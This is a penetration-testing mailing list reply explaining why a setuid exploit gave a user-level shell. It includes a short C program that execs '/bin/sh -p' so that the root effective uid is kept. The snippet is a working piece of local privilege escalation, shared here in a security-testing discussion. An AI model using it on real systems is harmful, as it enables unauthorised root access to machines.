Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: question on escalating privileges via suid vulnerabilities

From: Christoph Bussenius <pepe-bugtraq () pepe is-a-geek org>
Date: Mon, 26 Feb 2007 13:51:04 +0100
Hi John,

On Sat, Feb 24, 2007 at 11:52:49AM -0700, John McGuire wrote:

When I run the app as a non-root user, I get a /bin/sh prompt with
that users perms, not roots. I modified this program a bit to take an
argument off the command line and passed it `whoami`. This returned
root as the response. /bin/sh however belongs to the lower priv user.


Bash resets its effective uid to the real uid unless you give it the -p
switch.  This will work:

#include <stdio.h>
int main() {
       char *arr[3];
       arr[0] = "/bin/sh";
       arr[1] = "-p";
       arr[2] = NULL;
       execve (arr[0], arr, NULL);
}

Regards,
Christoph

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.

http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: